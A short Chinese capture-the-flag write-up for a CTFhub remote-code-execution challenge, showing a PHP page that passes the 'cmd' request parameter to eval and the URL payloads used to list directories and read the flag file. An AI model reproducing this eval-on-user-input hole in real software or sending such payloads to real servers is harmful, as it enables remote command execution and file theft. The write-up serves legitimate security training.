CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
顾随1 分钟前
(2)达梦数据库--SQl基础实践
前端·数据库·sql
键盘飞行员2 分钟前
Windsurf + Claude 4.7 前端开发:用 ui-ux-pro-max 根治 “AI 味”、实现全站 UI 统一
前端·ui·ai编程
IT_陈寒3 分钟前
被JavaScript的隐式类型转换坑到怀疑人生,记录这次离谱经历
前端·人工智能·后端
梦无矶3 分钟前
快速设置npm默认源为国内全局镜像源
前端·npm·node.js
Gerardisite8 分钟前
企业微信客户管理系统实战:标签、分层与自动化流程搭建
java·python·机器人·自动化·企业微信
ch.ju12 分钟前
Java程序设计(第3版)第三章——数组的定义方式
java·开发语言
aichitang202418 分钟前
HTML 实时预览工具
前端·html
广州智维科技19 分钟前
Kvaser Edge WL400S:工业级边缘计算与 CAN‑FD 数据采集平台解析73-30130-01688-0
前端·edge·边缘计算
aichitang202422 分钟前
椭圆的光学性质
html·html5·几何学
Chloeis Syntax27 分钟前
JavaEE学习日记(2)---文件操作和IO
java·笔记·学习·java-ee